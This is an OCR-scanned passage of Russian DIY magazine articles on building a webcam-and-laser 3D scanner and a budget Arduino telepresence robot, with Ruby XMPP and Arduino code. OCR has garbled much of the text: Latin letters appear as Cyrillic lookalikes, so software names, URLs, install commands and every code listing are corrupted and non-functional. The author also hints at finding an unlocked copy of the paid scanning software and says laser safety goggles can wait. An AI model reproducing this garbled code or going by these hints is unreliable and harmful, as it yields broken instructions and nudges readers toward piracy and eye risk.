будем делатьсами. Ниже я хочу поделиться стобой опытом, какможно 
собрать 30-сканер своими руками. Я не только расскажу, какие компо- 
ненты и где купитьдля этого, но и какэтим сканером пользоваться. 
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Что нам 
понадобится? 

Смастерить свой Зй-сканер, как оказалось, 
можно буквально из подручных материалов: 
нам потребуется специальная программа, ла- 
зерная указка, веб-камера, а также некоторые 
самодельные приспособления. 



эдѵгв 



СПЕЦИАЛЬНЫЙ СОФТ 



1,4 




Самой важной частью сканера, в том 
числе дорогостоящего профессио- 
нального, является его мозг — про- 
граммное обеспечение, которое 
выполняет оцифровку. То, что необхо- 
димо нам, — это инструменты, которые 
позволяютсканировать/оцифровы- 
ШЩЖ I ватьтрехмерные объекты с помощью 
- , * подручных средств: веб-камеры и 

лазерной указки. Таковыми являют- 
ся ОАѴЮ-Іазегзсаппег ( ѵѵѵѵѵѵ.баѵісі-іазегзсаппег.сот і и ТгіАпдІез 
( ѵѵѵѵѵѵ.іпітісасі.сот ), доступные для свободного тестирования, нос 
некоторыми ограничениями. Последний имеет до вольно неприятное 
ограничение: для его работы необходим равномерно вращающийся 
столик, на котором будет располагаться сканируемый объект. Ктому 
же предъявляются суровые требования к самому объекту. Его форма 
должна быть близка к цилиндрической, а еще лучше — сферической. 
ОАѴЮ-Іазегзсаппег подобных требований не предъявляет, поэтому 
я выбрал его. Несмотря на то что программа платная и ее стоимость 
колеблется от 199 до 229 евро, тестировать ее можно сколь угодно 
долго — лимитов по времени нет. Единственное ограничение заклю- 
чается в особенностях сохранения результатов сканирования. Сохра- 
нить сканы можно, новнизком качестве. Впрочем, на просторах Сети 
иногда случаются чудеса, и еслитебеудастся найти версию ОАѴЮ'а, 
которая сохраняетв высоком качестве, значит, ты сэкономишьи на 
этом. А кто ищет — тотвсегда найдет. 



ВЕБ-КАМЕРА 

Параметры объекта, необходимые 
для составления объекта, программа 
считываете помощью веб-камеры. 

Она, возможно, утебя есть. Еслитак — 
прекрасно, можешь попробовать 
провернуть всё с ней. Главное, чтобы 
разрешение было не меньше 640x480. 
Есть и другие требования: наличие 
ручной фокусировки (возможности 
отключатьавтофокус], минимум шумов 
при высоком разрешении, качественная линза камеры — линза не 
должна давать сильных искажений. Камера должна подключаться 
к 115В -порту и работать на Ѵ\Ю М -драй верах (т. е., попросту говоря, 
должна быть видна для выбора в программе ОАѴЮ). Большинство со- 
временных веб-камер удовлетворяют этим требованиям, но проверить 
ихсовместимостьс ОАѴЮ можемтолько мы стобой, поэтомудоверимся 
рекомендациям создателей программы во избежание всяких неожи- 
данностей. Из дешевых камер сам разработчик рекомендует Бод і*есН 
ѴѴеЬСат Рго 9000 ѵѵИГі сат Ноібег, которую можно купить долл а ров за 
сто. Я же успешно выполнял сканирования моей І_одіІесЬ С270 стоимо- 
стью около 35 долларов. 




ЛАЗЕРНЫЙ МОДУЛЬ 

Для работы сканера необходим ком- 
понент, который будет даватьлинию. 
Именно линию, а не точку. Это важно! На 
форумах я прочел, что подойдет обычная 
китайская лазерная указка, но это не 
так. Какбы быстроты ни водил рукой, 
вооруженной лазерной указкой, это 
всё не то. Чуть позже я объясню почему. 
Сейчас важно одного — нужен сканер, 
который дает лин ию. Красный, зеленый, 
синий — цвет сканера неважен. Вообще можно обойтись и без сканера, 
воспользовавшисьальтернативными решениями (читай воврезке]. Но 
лазерный модуль — этосовершенноточносамый простой и доступный 
вариант. Я приобрел модуль красного лазера 650 нМ с фокусировкой 
линии мощностью 5 мВт, он стоил 25 долла ров. Та кой можно купить где 
угодно, например в хозяйственном магазине или через и нет, как это 
сделал я (кажется, в ѵѵѵѵѵѵ.агеепіазег.соіті.иа ]. Модули большей мощ- 
ности (до 20 мВт] не рекомендую приобретать, так как их использование 
целесообразно в очень редких случаях. Есть готовые модули с автоном- 
ным питанием — если найдешь, то купи лучше та кой. Мне же для своего 
лазерного модуля пришлосьсоздатьнебольшую оснастку, чтобы было 
удобно держать в руке, включать/выключать. Запитал я его обычной 
кроной 9 В: красный провод «+», черный «-» : если наоборот, то будет 
греться и, какрезультат, выйдетизстроя раньше времени. 





КАЛИБРОВОЧНЫЙ УГОЛ. 



Ориентироваться в пространстве, 
получая возможностьсчитывать 
параметры изображения, позволяет 
программе специальная приспосо- 
ба — калибровочныйугол. Небойся, 
это самый дешевый компонент, 
представляющий собой два листа со 
специально нанесенными маркера- 
ми, которые нужно расположить под 
углом 90°. Послеустановки ОАѴЮ'аты 
найдешь файлы в формате РОЕ ил иСОРв корневом каталоге, напри- 
мер «СаІіЬроіпІ5_5саІеЗО_ОІІ\І_А4.рсІЬ>. Илисаналогичнымименем, 
нов формате СОР для печати из СогеЮгаѵѵ. Выбери тот файл, название 
которого соответствуетформату бумаги, на которойты собираешься 
печатать. Вообще советую исходить от размера сканируемого объек- 
та. Не стоит делать большой угол, если ты собираешься сканировать 
маленькие объекты. Для начала вполне подойдут калибровочные 
листы формата А4. Сложнее закрепить их под правильным углом. Свой 
первый угол я сделал так — просто согнул белый гофрокартон, за кре- 
пил его наоснове, поел ечего прикрепил стык в стык калибровочные 
листы. Лучше их не клеить, так как л исты станут волнистыми — это 
недопустимо. Вместо этого можно аккуратно прикрепить их по краям 
скотчем. Должен сказать, что после первыхже сканов стало понятно, 
что угол не идеальный. Поэтому пришлось всё переделать: я соединил 
два куска ДСП, скрепив их уголками. Получилось хорошо: угол 90°, 
поверхность идеально ровная — всего этого нельзя было бы добиться 
с гофрокартоном. Словом, тут есть множество вариантов. 



НИВ КОЕМ СЛУЧАЕ НЕ НАПРАВЛЯЙ ЛУЧ ПРЯМО В ГЛАЗА. 
ЭТО ОЧЕНЬ ОПАСНО, ТАК КАК ЯРКОСТЬ ЛУЧА НАСТОЛЬКО 
ВЕЛИКА, ЧТО ДАЖЕ КРАТКОВРЕМЕННОЕ ПОПАДАНИЕ В 
ГЛАЗ МОЖЕТ ВЫЖЕЧЬ СЕТЧАТКУ ГЛАЗА. ПОПАДАНИЕ НА 
КОЖУ НЕ ОПАСНО. ВООБЩЕ РЕКОМЕНДУЮ ПРИОБРЕСТИ 
СПЕЦИАЛЬНЫЕ ОЧКИ ДЛЯ РАБОТЫ С ЛАЗЕРОМ, НО ЭТО УЖЕ 
ПОТОМ, А НА ПЕРВЫХ ПОРАХ МОЖНО И БЕЗ НИХ. 
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РС20ЫЕ 



Какэто 

происходит? 

Теперь самое интересное — приступаем к самому процессу ска- 
нирования. О глянись вокруг: в комнате наверняка найдутся какие- 
нибудь сувениры или статуэтки — для экспериментов подойдет 
любой небольшой объект. Что точно не годится, так это прозрачные 
или полупрозрачные предметы. Луч лазера должен отражаться, а не 
поглощаться предметами. Создатели ОАѴЮ'а рекомендуют в таких 
случаях покрывать предметы тальком или, если не жал ко, аэро- 
зольной краской. Я неутруждал себя и взял несколько статуэток. 
Условно в процессе сканирования можно выделить четыре этапа, 
расскажу о каждом подробнее. 

1 ЭТАП 

Калибровка 

Это предварительный этап, поэтому объект для сканирования пока 
отложим в сторону. Закрепи веб-ка меру напротив калибровочного угла 
таким образом, чтобы все компоненты были неподвижны относи- 
тельно друг друга. Камеру стоит расположить на уровне нижнего края 
калибровочных л истов. Во время калибровки камеры изображение 
должно быть ярким. Я выполнял сканирование вечером или днем, но 
с затененным окном, а калибровочный угол освещал искусственным 
светом. Сама калибровка осуществляется в ОАѴЮ-Іазегзсаппег. 
Выбираем из списка устройств нашу веб-ка меру, настраиваем изо- 
бражение: повышаем яркость, контраст. В результате на экране видны 
толькочерные маркеры. Жмем кнопку «Калибровать камеру». Если 




Настраиваемсканер 




Сканирование: со светом и без 



всё сделано правильно, программа поздравиттебя, что калибровка 
прошла успешно. В противном случае можно попробовать изменить 
положение веб-ка меры, поиграться с яркостью и контрастом. У меня 
получилось не с первого раза, но потом радости было как после первой 
сданной сессии! 

2 ЭТАП 

Размещение объекта 

Для сканирования необходимо расположить объект в углу кал ибровоч- 
н ого угла. Для лучшего результата он должен быть приблизительно по- 
середине калибровочных л истов. Если его размеры небольшие, можно 
использоватьподставку: коробку, книги, деревянный брусокпод- 
ходящего размера. Укажи программе тип используемого лазера. Далее 
тушим свет! На экране должно быть темн о. Если не та к — понижаем 
значения яркости. Не пугайся, если маркеров не видно: программа 
запомнила их расположение, и теп ерь он и нам не столь важны. Включи 
лазер и направь его на угол чуть выше нашего предмета. На экране 
должна появиться ломаная белая линия (программа анализирует 
черно-белое изображение]. Расстояние между камерой и плоскостью 
лазера (т. е. триангуляционный угол] должно быть настолько большим, 
насколько это возможно, — это нужнодля большейточности. Иначеты 
увидишьпредупреждение:«Угол пересечения слишком мал». В начале 
статьи я отговорил тебя от использования точечной лазерной указки, 
и вот почему. Даже быстро водя точечной указкой, ты не только не по- 
лучишь ровную линию, ной программа не сможет посчитать величину 
триангуляционного угла. 

3 ЭТАП 

Сканирование 

Процесс сканирования начинается после нажатия кнопки «Старт». Не- 
обходимо провести пообъектулучом вниз-вверх несколько раз, чтобы 
программа через веб-ка меру считала параметры объекта. Тут есть 
важный момент: нужно поворачивать кисть с лазером, а не опускать 
руку! Скорость не важна, но не старайся делать это очень быстро. При 
сканировании я чаще смотрел йена объект, а на экран, глядя, как про- 
грамма а на лизирует форму предмета, вырисовывая на экране цветные 
линии. Смотреть на экран удобнее по двум причинам. Во-первых, если 



ЕСЛИТЫНЕХОЧЕШЬУТРУЖДАТЬСЕБЯ И ТЕБЕ НЕЖАЛКО 
$500, МОЖЕШЬ ПРИОБРЕСТИ 0АѴШ-І.А5ЕК5САММЕК 
5ТАНТЕН-КІТ, КОТОРЫЙ СОДЕРЖИТ И ЛАЗЕРНЫЙ МОДУЛЬ, 
И ВЕБ-КАМЕРУ ЬОСІТЕСН РНО 9000, И КАЛИБРОВОЧНЫЙ 
УГОЛ, И УБВ-ФЛЕШКУ С ПРОГРАММОЙ. 
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Промежуточный резулыатсканирования 

линия лазера не будет видна с обеих сторон предмета или недостаточ- 
ным будеттриангуляционныйугол, программа сразу выдастсообщение 
(и ты сможешь это исправить]. Во-вторых, смотреть на лазер утоми - 
тельнодля глаз из-за высокого контраста между черным фоном и 
ярким лучом. Пройдя по предметулучом вниз-вверх столько, сколько 
потребуется, жмем кнопку «Пауза». Теперь можно сохранить результат 
сканирования в отдельный файл с помощью кнопки «Сохранить». Есть 
другой вариант — сразу передать изображение для последующего 
сшивания с други ми сканами, нажав кнопку «Пере нести». При нажатии 
«Перенести» скан передается на следующий этап (склейку) без со- 
хранения в файл, но текущий этап мы не покидаем и можем повторить 
сканирование, изменив положение объекта (не забудь перед новым 
сканированием нажать на кнопку «Стереть»). Тут важно понимать: для 
создания модели необходимо сделать несколько сканов. Для простых 
предметов тебе будет достаточно поворачивать объект, например, на 
45°. Если поверхностьпредмета сложная, то потребуется сканировать 
его с разных сторон и л ишь потом сшивать сканы. Еще один важный 
момент: сканы обязательно должны перекрывать другдруга, чтобы 
программе было легче анализировать их. 

4-Й ЭТАП 

Сшиваниеформ 

Последний шаг перед получением модели — это склейка сканов. Если 
ты не сохранял сканы, а передавал их на склейку с помощью соответ- 
ствующей кнопки, то можешь приступать к сшиванию сразу. В против- 
ном случае жмем кнопку «Добавить» и загружаем ранее сохраненные 
файлы. Процесс сшивания можно разделить на два этапа: стыковка 
сканов и собственно сшивание. Выбирая попарно сканы,тыуказыва- 
ешь программе на метод стыковки. ОАѴЮ справляется с этим очень 
даже замечательно при условии, что есть чему стыковаться — сканы 
должны перекрыватьдругдруга. Если лоскуты не перекрываются, тебе 




Самодельный Зй-сканер позволяет получить неплохой результат 

придется вернуться на предыдущий этап и осуществить сканирование 
изтехположений объекта, которые дадуттакое перекрытие. Выполнив 
стыковку для всехсканов,жмем на кнопку«Сшить». Взависимости 
от выбранных настроек через несколько секунд мы увидим результат 
сшивания всех сканов в единую модель. Жмем кнопку «Сохранить». 

Теп ерь можно за грузить нашу модель в 2ВгизИ или МибЬох и довести ее 
до совершенства. Модель готова! 

В программе ТгіАпдІез благодаря вращению предмета формирова- 
ние оцифрованной поверхности происходило бы автоматически, это ее 
преимущество перед ОАѴЮ'ом. Но как бы она справил ась с форм и ро- 



ван и ем поверхности в «мертвых» зонах? Думаю, никак. Либо в этих ме- 
стах мы бы получили погрешность. Мы же хотел и получить модель как 
можно бол ее точную. Поэтому дополнительные действия по сшиванию 
сканов будем считать необходимыми издержками. 
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Дорабатываем готовую модель вЗР-редакторе 



ЕСЛИНЕТЛАЗЕРА 

ля 30-сканирования объекта можно обойтись и без лазера (я не шучу]. 
Подойдет проект с мощной лампой, свет которой нужно направить 
сквозь узкую щель на сканируемый объект. Получим узкую белую ли- 
нию — чем небелый лазер? Правда, помимо проектора (который не дёшев сам 
посебе] нужна еще и серьезная оснастка дляудержания проектора в нужном 
положении. Это геморрой но. Можно пойти от обратного — направить яркий 
свет, а по объекту провести тенью от натянутой нити: та кое тоже предусмотрено 
разработчиками программы. В этом случае программа может инвертировать 
обрабатываемую картинку. Однако что-то мне подсказывало, что это не даст 
хорошего результата. 




ВМЕСТО ЗАКЛЮЧЕНИЯ 

Собрать Зй -сканер, который будет выдавать более чем приличный 
результат, вполне возможно дома. Надеюсь, ты в этом сможешь убе- 
диться. К сожалению, для сканирования маленьких объектов (а мне 
нужно было создать объекты для ювелирных изделий] нужна очень 
хорошая 115В- камера с СС 0 -матрицей, которой у меня нет (она доста- 
точно дорогая), поэтому мой опыт та к и остался опытом: применить 
его на деле для сканирования ювелирных изделий не получилось. Но 
я испытал незабываемоеудовольствие, получая полноценные моде- 
ли самых разных объектов с помощью сканера, который был собран 
буквально на коленке. НЕ 
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ДЕЛАЕМ БЮДЖЕТНОГО 
РОБОТА ТЕЛЕПРИСУТСТВИЯ 
ЗА 300 ДОЛЛАРОВ 




Боты телеприсутствия — Бкуре-фоны на колеси- 
ках — позволяют находиться в двух местах одно- 
временно, чем могут неплохо сэкономить время. 
Правда, серийные модели стоят отБООО долларов, 
так что доступностьу них ограничена. Но отчаи- 
ваться не стоит, ведь не дороже чем за 300 долла- 
ровты можешь сделать такого робота сам! 



ДЛЯ ЧЕГО? 



Класснопорой где-нибудьтелеприсутствовать. Например, сидетьдома в 
халате с чашечкой ароматного кофе, а в душной переговорке поднадоев- 
шего офиса будетшуршать моторами роботтелеприсутствия и переда- 
вать коллегам картинку твоего улыбающегося лица. От необходимости 
следитьза происходящим и вовремя вставлятьсвои идеи он, конечно, не 
спасет, нокомфортадобавитьможет. Ещетакой роботпоможетобщаться 
с любимой, находящейся в другом городе, да и приглядетьза ней, если 
что. Чтобы такой роботу тебя появился, нужно, во-первых, его собрать: 
шасси, управлениедвигателями, нетбук(мозг, камера иэкран), а во- 
вторых, нужно запрограммировать клиентскую и серверную часть. Но 
теперь обо всем подробно. 



ШАССИ 



Робота нужно делать достаточно крупным и высоким, чтобы он был устой- 
чивым, а экран чтобы был не сильно ниже уровня глаз. Нести на борту 
нашему роботу придется увесистый свинцово-кислотный аккумулятор 
(оптимальный выбор 12 В, 7Ач, 600 руб.) и нетбук, поэтому платформа 
должна выдерживатьнагрузкув 1 0—1 5 кг (тогда можнобудети парубано- 
чек с прохладным пенящимся квасом из холодильника на нем возить]. 

Теперь определимся с количеством колес. В современном теле- 
роботостроении модно использовать двухколесные тележки в стиле 
Ведѵѵау. Сделать такую штуковину в дома шнихусловиях в целом реально, 
но довольно муторно в случае создания крупных роботов. Поэтому я 
предлагаю ограничиться более простым вариантом — добавитьтретье 
опорное колесо. В качестве третьего колеса подойдет недорогое (35 
рублей] вращающееся колесикодля мебели. Для особойустойчивости 
дополнительных колес можно взять и два. 



В качестве ведущих колес круто использовать колеса для садовых 
тачек или для тележек из супермаркета. В них часто встречаются 
встроенные подшипники, которые упрощают за дачу создания веду- 
щей части. Всё в них хорошо, только платить по 500-700 рублей за одно 
колесо совсем неохота. Есть вариант более бюджетный — исполь- 
зовать боковые колесики для детских велосипедов. У них и диаметр 
вполне достаточный — 13 см, ишириныв 2,5 см хватает для надежного 
сцепления с полом (даже по ковру ездит не проскальзывая]. Стоят эти 
колеса 130 рублейза пару. 

Теперь о выборе моторов. Робот не хилый, и всякими пластиковыми 
хлипкими мотор-редукторами из китайских игрушечных машинок здесь 
неотделаться. Популярный вариантдлятакихроботов — использовать 
вазовские моторы для стеклоподъемников или стеклоочистителей. 
Самый большой их недостаток в том, что они оборудованы червячными 
мотор-редукторами, которые не имеютобратной связи (т. е. не получится, 
покрутив колесо, передать вращение на мотор; колесо вообще само по 
себе покрутить не получится]. При резких торможениях, когда инерции 
в колесе еще много, а мотор уже отключен, вся энергия пойдет на по- 
ломкушестеренок, идолгоони непроживут. Проблема побольшей части 
решаемая — нужно просто плавно включать и выключать мотор, но есть 
за эти же деньги (600-700 рублей за мотор) и другое, не менее элегант- 
ное решение: дешевые китайские 12-вольтовые шуруповерты. У них 
редуктор планетарный, и подобного недостатка у него нет. До идеала им 
тоже далековато: дольше десяти минутнепрерывно и на полной скорости 
крутиться эти моторы не смогут — перегреются, но на практике это и не 
нужно, только если непосылать робота вдалекий магазин. Мощностиже 
и оборотов у них с головой, так что использоваться они будут в щадящем 
режиме. Плюс шуруповерты продаются с патроном, в который можно сра- 
зу закрепить колесо при помощи болта, чем сильно упростить ведущую 
часть. 

Моторы с колесами еще необходимо на чем-то укреплять. Можно со- 
брать коробку для аккумуляторов, электроники и груза из алюминиевого 
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профиля или дерева. Но лучше посетить задний двор ближайшего супер- 
маркета и подобратьтам плотный пластмассовый ящик из-под фруктов. 
При помощи саморезов можно установить на нем нетолстые деревянные 
брусочки, к которым укрепить моторы и вспомогательные колеса. 

Моторы для шуруповертов имеют специфическую форму, и уста- 
навливать их без родного корпуса не просто. Решение же довольно 
тривиально — доработать корпус шуруповерта ножовкой и напильни- 
ком и устанавливать мотор в нем. Всю внутреннюю электронику нам 
придется выкинуть, оставив лишь мотор с двумя проводами, которые 
нужно вывести наружу из корпуса. Если в твоих шуруповертах нет 
керамических конденсаторов на 100 нФ между контактами мотора, то 
рекомендую их туда припаять: спасет от помех на логике и ее самопро- 
извольного сброса. Можно при паять два таких конденсатора — между 
контактами мотора и его корпусом, но для этого потребуется мощный 
паяльники аккуратность, чтобы, с одной стороны, прогреть стенки мо- 
тора, а с другой, не повредить пластиковые части. Впрочем, фильтры 
можно добавить и на силовую плату. 



СОБИРАЕМ ЗАЩИТНИКАВСЕЛЕННОЙ 



Кромеящика с моторами нужен еще крепкий брусок, на котором будет 
укреплен стол и к для ноутбука. Оптимальная дли на такая, чтобы 
общая высота получилась примерно 110 см, — тогда на ноутбуке будет 
удобной набиратьи получится не просто роботтелеприсутствия, а 
полноценное рабочее место, которое в состоянии следовать за тобой 
повсюду. Столик для ноутбука можно сделать из куска оргстекла 
(размером примерно с л исток А4], а закрепить на стальные уголки при 
помощи болтов или вытяжных заклепок. Всё, что не закреплено само- 
резами: моторы, платы, провода, аккумулятор, — удобнозакрепить 
при помощи нейлоновых стяжек. Способ недорогой и предельно сер- 
дитый. Конечно, моторы с колесами из-затакого крепления придется 
часто отправлять на развал-схождение. 



вносим мозги 



Теперь нужно создать электронную и программную части. В общем, схема 
такова: на удаленном клиенте, который соединяется с миром через ѴѴіРі- 
или 36-модем, запущена программа, которая читает нажатия стрелочек 
на клавиатуре и при помощиХМРР(напримербТаІк'а) передает со- 
общения с управляющими командами на сервер, которым является наш 
робот. Там еще один управляющий скрипт отлавливает эти сообщения и 
записывает их в виртуал ьный СОМ -порт, который создан Агбиіпо. Дальше 
ардуино отправляет сигналы на силовую плату, которая непосред- 
ственно управляет моторами. Именно ее сейчас и рассмотрим. Мотор от 
шуруповерта в момент ста рта потребляет больше 10 А, а во время работы 
минимум 2 А постоя нно. Управлять такой мощной штукой удобно л ибо с 
помощью реле (но для них самих придется городить схему включения], 
л ибо полевыми транзистора ми. Для начала разберем самый простой 
вариант(схема 1], который позволитнезависимо крутиться колесам, 
причем с разной скоростью. Еще плюс — для этой схемы нужно совсем 
немного деталей, и собрать ее можно на макетной плате (только не про- 
буй собиратьее на беспаечной макетке — она не выдержиттакихтоков). 
Главный недостатоктакой схемы — крутиться колеса смогуттолько в 
одну сторону, а значит, роботу потребуется пространство для маневров — 
разворотна местедля него недоступен. 

Основа этой схемы — полевой транзистор (01, 02) ІПІ_530. По заявле- 
нию производителя, он может открываться от логического уровня в 5 В, 
который даетвыходардуино.Чтобыуправлятьмоторами плавно, будем 
подавать на нихШИМ-сигнал. В ШИМ-режиме часть времени выход 
включен, часть выключен, но в среднем получается, будто выход включен 
неполной мощностью. Переключения из состояния в состояние проис- 
ходят с частотой в несколько килогерц, и сглаживание очень качествен- 
ное. По идее, всё должно быть хорошо, да воттолько слабенький ток от 
микроконтроллера оченьдолго открываетзатвортранзистора, поэтому 
получается, что большую часть времени транзистор проводит в полуот- 
крытом состоянии, когда его сопротивление велико, а ток через него 
не мал. В результате натранзисторахможножаритьяичницу, правда, 
недолго: мои после пяти минутработы робота сгорели вовсе. Возможно, 
лучше будет работать другой популярный транзистор — с управлением 
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Схема 1. Простейшая схема силовой части 
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логическим уровнем — РРР30КІ06І_Е производства РаігсЫІсІ, который 
можетуправляться иуровнем в3,3 В. 

Но если уж заморачиваться с та ким роботом, можно сделать всё по 
максимуму и соорудить полноценный Н -мост (схема 2), для которого взять 
МОБРЕТ'ы помощнее, например I РР1 31 0 — с рабочим током в 42 А. У та кого 
транзистора даже при пуске мотора будет4-кратный запас по мощности, 
точно не сгорит. А чтобы он открывался полностью и реализовывал весь 
свой потенциал, управлятьим будетспециальный полумостовой драйвер 
ІН2110. Н мост позволит колесам вращаться в обе стороны, а защищенная 
схема будет работать стабильно и без перегрева. Собрать его несколько 
сложнее — деталей гораздо больше (таблица 2), много защитных диодов 
и фильтрующих конденсаторов. На макетке такую плату сделатьеще воз- 
можно, но проще будет вытравить для нее специальную плату. Сделать ее 
дома можно, например, при помощи фоторезиста, ноэтотметодудобен, 
только если платы приходится делать часто. Для разового применения 
проще воспользоваться ЛУТ — лазерно-утюжной технологией (по ссылке 
обучающееей видео ооо.аі/гізг ). 

После того как силовая часть сделана, ее нужно подключить к 
Агбиіпо. В случае первой схемы их будет всего три — два кШИМ- 
выходам 1 0 и 11 иодин кземле. Сжелезом покончено. Теперьсказоб 
управляющем софте. 



МЫСЛИТЕЛЬНЫЙ ПРОЦЕСС 



Видеоаудиоданные в системе передаются независимо отуправления. 
Городитьсобственнуюсистемутелеконференций длятелебота бес- 
смысленно. МожнозапростоиспользоватьБкуреили видеочатбоодіе, 
оба они кроссплатформенны, поэтому вся программная часть может быть 
организована подІІЬип^и. В скайпе удобно поста вить в настройках галоч- 
ку «Автоматически отвечать на вызов», чтобы можно было подключиться 
кроботувлюбой момент. 

Теперьуправляющий софт. Нам понадобится серверная и клиент- 
ская часть для РСи прошивка для Агбиіпо. Управл яющие скрипты будем 
писать на РиЬу под управлением ІІЬип1:и (ни каких хитрых библиотек в 
скриптах не используется, и онидолжны работать и в среде ѴѴіпсІоѵѵз, и в 
среде Судѵѵіп]. На обеих машинах ставим интерпретатор: 

зисіо арі-ееі іпзііаіі гиЬу гиЬу%етз 

Помимо руби, понадобится еще и пара библиотек на клиенте для 
работы с ЗаЬЬег'ом: 

зисіо §еш іпзііаіі хтрр4п-5Іш р1е 

На сервере, помимо нее, понадобится еще и библиотека работы с по- 
следовательным портом: 

зисіо §еш іпзііаіі хтрр4г-зітр1е гиЬу-зегіаІрогІ: 

Укода сервера простаязадача — получитьуправляющуюкоманду 
по ЗаЬЬег'у и отослать ее микроконтроллеру через последовательный 



порт. Формат команд тоже не сложен — два числа от 0 до 255, через про- 
бел. Каждое число — значение, на выходе ШИМ — 255 максимальная 
скорость, 0 — остановка. 

Код сервера 
педиіпе 'пиЬу^етз 1 
гедиіге , хтрр4п-5Ітр1е' 
гедиіпе 'зегіаХрог-Е 1 

# проинииыализировали все библиотеки 

зр = БегіаІРогІі.пем ,, /сIеѵ/^Е^Ьу^5В0 ,, . 9600 

# открыли последовательный порт 

іт = ЗаЬЬег::5ітр1е.пеы("ыы@таі1.сот". "разз"1 

# соединились с ЗаЬЬег'ом 

мііііе(іігие) сіо 

# и до бесконечности 

іт.гесеіѵесі тезза^ез сіо | тезза%е| 

# про вер я ем пришедшие сообщения 

риііз "#{тезза§е.ЬосІ у}" 

а.Ь = теззаде.ЬосІѵ.зрІіІіС '1 

# разбираем, если что-то пришло 

зр.мггЕе а.1:о_і.сМп+Ь.1:о_і.сМп 

# и записываем в порт 

# пускай контроллер разбира ется 
епсі 

зіеер 0.05 

# немного погодя всё заново 

епсі 



Запустить этот скрипт просто командой 
гиЬу ІіеІеЬоІі.зепѵег.пЬ 



ТЕЛЕБОТ НАПРОКАТ 



ели хочешь попробовать ощутить 
себя в шкуре робота, то делать своего 
телебота вовсе не нужно. Можно взять 
одного напрокат. Например, популярного доволь- 
но известного российского НВоГа ( Ыесігоісіз.ги і — 
ведрообразного робота с очень подвижной шеей 
и доброжелательным выражением лица, хотя он 
создан в основном для рекламных целей. Для 
веселого времяпровождения можно попробовать 
более аркадный вариант: поиграть в шутер от 
лица робота ( гоЬоі-ѵѵаг.ги ] или погонять по парку 
на реальных машинках ( аІаѵЬоТги ] 



г'Т 4 



1 

Л 




КВоІ— русский телебот 
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Видеочатна колесиках 



Послетого каккоманда отослана к контроллеру, ее нужно разобрать и 
тамужезаписатьсоответствующиезначения в ножку. 

Скетч для Агдиіпо 

іпі: ІРіп = 10; // Левый мото р 
іпі гРіп = 11; // П равы й мотор 
іпі соттапсі = 0; 
ѵоісі зеІіирО I 
5епіа1.Ье^іп(9600); } 

Ѵ0і(і 1оо р() { 

(5епіа1.аѵаі1аЫе() > 0) { 

// читаем команду правого мотора 

соттапсі = 5епіа1.пеасІ (); 

// пишем ком ан ду правого мот о ра 
апа1о§Ыггбе(гРіщ соттапсі); 

5егіа1.ргіп1і1п(соттапсІ. РЕС); 

// читаем команду левого мотора 

соттапсі = 5епіа1.пеасІ(); 

// записываем команду левого мотора 

апа1о§ІлІгі1:е(1Ріщ соттапсі); 

5епіа1.рпіп1:1п(соттапсІ^ РЕС); 

//в течение 300 мс моторы крутятся 

сІеІау(ЗѲѲ) :} 

//потом отключаются 

//и ждут новых указаний 

апа1о§ІлІгі1:е(гРіщ 0); 
апа1о§ІлІпі1:е(1Ріп, 0); } 

Благодаря такому простому формату передач и сообщений серверу 
клиента можно не писать и вовсе, просто сиди в чатике да переписывайся 
с роботом. Такой вариант, конечно, малоудобен, поэтому еще один скрипт, 
который будет читать нажатия клавиш клавиатуры и отсылать команды 
поджабберу. 

Понимать он будеттри стрелочки, а также цифры оті доЗ, которые 
задаютскорость. В скрипте используется небольшое количество магии, 
которая позволяетконсольномуприложениючитатьнажатия клавиш без 
подтверждения клавишей Епіег. 

Код клиента 

гециіге 'гиЬу§ет5' 
гедиіге , хтрр4п-5Ітр1е' 

@а = 255/3 

@іт ^аЬЬеп::5ітр1е.пем("рц@таі1.сот м , "разз") 
@гесіріеп1:="мм@таі1.сот" 

# читаем клавиши без нажатия Епііег 

сІеТ пеасІ_сІіап 
Ье^іп 

#магия начинается 

о1сІ_5І:а1:е^ '5І:1:у 
Бузует "з'Ь'Ьу гам -есііо" 
с = 5ТРІІМ.§е1:с.сНг 
іТ(с=="\е") 

ех1:па_1:ІіпеасІ = ТІіпеасІ.пем{ 
с = с + 5ТРІЫ . §е1;с . сМг 
с = с + 5ТРІМ.§е1:с.сІіп 
} 

ех1:па_1;ІіпеасІ.зоіп (0.00001) 

ех1:па_1:ИпеасІ . кііі 

епсі 

геБсие => ех 

риІіБ "#{ех.с1а55}: #{ех.те55а%е}" 
ри1:5 ех.Ьаск1:пасе 
епБипе 

Бузует "б^ѵ #{о1сі з^а^е}" 

епсі 

пе1:ипп с 

# магия кончается _ 



БАЛАНСИРУЮЩИЙ 
ДВУХКОЛЕСНЫЙ РОБОТ 



тобы сделатьбалансирующего робота, нужна простая двухко- 
лесная робоплатформа, ккоторой необходимо добавить гироскоп 
для измеренияугловой скорости отклонения (чтобы понять, когда 
робот начнет заваливаться) и акселерометр, чтобы знать, в какую сторону на- 
правлена гравитация, и корректировать показания гироскопа. Выпускаются, 
правда, эти микросхемы вужасно мелких корпусах, с которыми работатьдома 
почти невозможно, поэтому проще воспользоваться йІР-модулями, например 
от компании БрагкЩп (гироскоп зрагкіип.сот/ргосІис1:5/9059 и акселерометр 
5рагкіип.сот/ргосІис1:5/844 ). В качестве основы можно взятьфайлы проекта 
Агсіи РоІІег ( аііЬиЬ.соппЛазахс/АгсІиРоІІег І — та муже есть готовый код и схемы. 



епсі 

#разбираемся с прочитанными клавишами 

сІе-Р 5Ііом_5іп§1е_кеу 
с = пеасісііап 
сазе с 

# по нажатию кнопки отсылаем сообщение 

мМеп "\е[А" 

ри1:5 "Вперед" 

(Эіт.сІеІіѵегШгесіріепІ:. @а.1:о_5+" "+(а)а.1:о_5) 
мИеп "\е[С" 
ри1:5 "Направо" 

(Эіт.сіеііѵег^гесіріепі:, "0 "+@а.1:о_5) 
мііеп "\е[Р" 
ри1:5 "Налево" 

(Эіт.сІеІіѵегШгесіріепІ:. (5)а.1:о _ б+" 0") 

#цифры от 1 до 3 определяют скорость 
мНеп "1" 
ри1:5 "1" 

@а = 255/В 
мііеп "2" 
ри1:5 "2" 

@а = 25 5*2/3 
мИеп "3" 
ри1:5 "3" 

@а = 255 

# по езс прикрываем лавочку 

мііеп "\е" 

РгосезБ.ехіІ: 

епсі 

епсі 

#запѵскаем прослушку до конца времен 

5Ііом_5Іп§1е_кеу мЫ1е(1:пие) 

Все готово! Запускаем клиент и сервер и катаемся по квартире. Потом 
можно провести и уличные испытан ия — общаясь со слегка изумленными 
прохожими. 



КУДА КАТИТЬСЯ ДАЛЬШЕ? 



